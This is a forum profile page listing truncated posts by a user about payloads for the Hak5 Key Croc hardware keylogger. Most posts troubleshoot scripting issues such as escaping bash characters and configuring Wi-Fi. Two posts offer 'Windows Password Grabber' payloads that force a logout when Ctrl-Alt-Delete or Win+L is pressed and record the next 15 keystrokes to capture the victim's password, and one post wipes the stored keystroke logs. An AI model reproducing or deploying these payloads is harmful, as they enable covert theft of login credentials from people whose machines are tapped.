Jump to content

RootJunky

Active Members
  • Content Count

    25
  • Joined

  • Last visited

About RootJunky

  • Rank
    Hak5 Fan

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. I know how to edit the config file as seen here https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/wifispot.txt that is not what i am asking. I want to know what these do. Framework helpers https://docs.hak5.org/hc/en-us/articles/360048190473-Helpful-Payload-Snippets Run GET_HELPERS on your keycroc.
  2. I just want to know what what they do. you can leave it up to me to figure out if i want to use them.
  3. MATCH back Q GUI r Q STRING powershell Q ENTER Q STRING Start-Process "powershell" -Verb RunAs Q ENTER Q DELAY 10000 Q KEYCODE 00,00,50 Q ENTER Q STRING \$Password = Read-Host -AsSecureString p4ssw0rd Here is my script that i added a couple changes to. I gave you the wrong escape before. It is the forward slash \ as you can see in the payload above. The \ escapes the $ which is run on the linux match as a bash command and now with the \ is ignored and types it to the powershell window instead. you will need the \ before every $ in your script. Q
  4. ok i think i see your problem. You have to remember that the Keycroc is a linux device and some commands are seen as bash on that device when typed with Q STRING in your powershell window. you should try putting those commands that mess up inside of "" or () also you can escape the linux bash with / in front of the part of the sting that messes up. good luck let me know if that works for you.
  5. please run my croc info script and give me the output. also can you link one of the scripts you are trying to run on the keycroc. Also what does your config.txt file look like. Having these would be very helpful for trouble shooting. I will try and help if i can.
  6. I would love to have some more explanation of that this commands all do. ENABLE_WIFI ENABLE_INTERFACE START_WLAN_DHCP CLEAR_WIFI_CONFIG CONFIG_PSK_WIFI CONFIG_OPEN_WIFI I see that CLEAR_WIFI_CONFIG will rm /etc/wpa_supplicant.conf but I cant seem to get any of the other commands in my payload to work like ENABLE_WIFI 'SSID' 'PASSWORD' will not edit the /etc/wpa_supplicant.conf or the config.txt file so i am not sure what these commands do. Maybe they are broken. Please help.
  7. This is a simple payload that is used to clear the log files stored in the KeyCroc. This gives you a clean slate to work with on a new machine and not have to look at all of the old key strokes. Great for development and testing. # Title: croc log clear # Description: crocclear = keycroc log files wipe # Author: Rootjunky # Version: 1.0 # Category: Key Croc # MATCH crocclear QUACK LOCK echo > /root/loot/croc_char.log echo > /root/loot/croc_raw.log echo > /root/loot/matches.log QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QU
  8. totally agree this needs to be fixed in firmware version 1.4
  9. yes you nailed it when num lock is on i get 12 1 2 3 When num lock is off i get 12 Nothing as you can see but the enters.
  10. I just tested my Croc for number typing and it works just fine. Payload MATCH 12 QUACK ENTERQUACK STRING "1"QUACK ENTERQUACK STRING "2"QUACK ENTERQUACK STRING "3"QUACK ENTER typed 12 1 2 3 In fact when i typed twelve above it auto ran the Payload and typed the 1 2 3.
  11. something like this might work but if you mess it up you might loose your SSH connection to the croc. https://computingforgeeks.com/create-wi-fi-hotspot-on-ubuntu-debian-fedora-centos-arch/
  12. Yes fneagle that is a great idea but i dont know how to do that.
  13. For some reason QUACK GUI L wasn't working on my machine once control alt delete was matched but QUACK STRING GUI l works.
  14. Windows Password Grabber CAD This is a simple payload used to logout ones control alt delete is pressed on a windows PC, then it will capture the next 15 buttons pressed. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder. # Title: Windows Password Grabber # Description: When Control Alt Delete is pressed it will long out the current user and request a password that will be captured and stored in loot. # Author: RootJunky # Version: 1.0 # Category: Credentials # # MATCH \[CONTROL-ALT-DELETE\] LED ATTAC
  15. Windows Password Grabber GUI L This is a simple payload used to capture the next 15 buttons pressed once someone presses Windows button and L to log them self out of a PC. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder. # Title: Windows Password Grabber GUI L # Description: When GUI L is pressed it will long out the current user and request a password that will be captured and stored in loot. # Author: RootJunky # Version: 1.0 # Category: Credentials # # MATCH \[GUI-l] LED ATTACK STAGE1 SAVEKEYS /
×
×
  • Create New...